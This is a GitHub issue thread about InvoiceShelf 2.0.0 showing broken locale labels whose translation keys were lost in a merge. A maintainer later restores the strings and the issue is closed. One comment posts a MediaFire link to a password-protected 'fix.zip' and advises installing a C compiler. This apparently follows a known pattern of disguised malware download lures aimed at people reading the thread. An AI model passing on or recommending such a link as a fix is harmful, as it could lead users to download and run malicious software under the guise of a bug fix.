### ISSUE TITLE
[blame] - locale label path point to missing key values

### ISSUE THREAD

**Issue by rihards-simanovics** [InvoiceShelf/InvoiceShelf#160]
**Describe the bug**
Some default locale labels appear to have been broken.

**Expected behavior**
correct locale label is used, and labels get correctly translated.

**Screenshots**
![image](https://github.com/user-attachments/assets/90475e44-396f-47dc-a1a8-783c0666cc71)
![image](https://github.com/user-attachments/assets/75429c48-5fc0-4a5a-ba31-437b7d5c04c1)
![image](https://github.com/user-attachments/assets/626cbf55-644b-47f4-9c43-f0df785956de)
![image](https://github.com/user-attachments/assets/a60d8e49-f899-44dd-93d0-5ddd23a7fc79)
![image](https://github.com/user-attachments/assets/6716a921-c026-4cef-aed9-4f125f1d5207)

**Please complete the following information:**
- InvoiceShelf version: 2.0.0 (direct upgrade from 1.3.0)
- PHP version: 8.2.23
- Database type and version: MariaDB

**Optional info**
- OS:  Ubuntu 22.04
- Browser: Arc (Windows) chromium

blame: https://github.com/InvoiceShelf/InvoiceShelf/pull/85

**Comment by SagarChandra07** [comment]
This might help:This file might fix it
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme

you may need to install the c compiler

**Comment by mihir1313** [comment]
Assign me this task. I will check this.

**Comment by rihards-simanovics** [comment]
> Assign me this task. I will check this.

No need for assignment, PRs are open.

I was just keeping this for the record as was thinking of doing it myself sometime during weekends, but you are welcome to tackle this if want.

**Comment by BaxAndrei-SEC-ACC** [comment]
Hey! Found few more:
![image](https://github.com/user-attachments/assets/5fede992-3ddd-47d6-850f-af8f1c861d87)
![image](https://github.com/user-attachments/assets/86f3d178-0dfd-40f5-a302-3701cdcd66f7)
![image](https://github.com/user-attachments/assets/cdad3848-fac8-4029-86da-663c8359c963)

Also modules.sign_up_and_get_token redirects to broken link https://invoiceshelf.com/auth/customer/register

**Comment by BaxAndrei** [comment]
![image](https://github.com/user-attachments/assets/0254d23d-89c0-41ee-95f4-d6b21345890d)

**Comment by rihards-simanovics** [comment]
Hey @gdarko I seen some PRs mentioning the missing strings, are you referring to the missing locales, the original message contains the link to the blame commit.

**Comment by gdarko** [comment]
Hey - @rihards-simanovics  - Exactly. The strings were lost during [this merge](https://github.com/InvoiceShelf/InvoiceShelf/commit/c8c75a6aa7560e80f342e2bda40aeb037fa98505#diff-1d56632a2d162f99c901e53b79a6224e984c14501bca3188a85dbb4b4c5e6da1). I recovered them in this [commit](https://github.com/InvoiceShelf/InvoiceShelf/commit/84c10264ed4e05ba708531c4bb4f2d5acd2bd0bc).

**Comment by rihards-simanovics** [comment]
closing as completed.
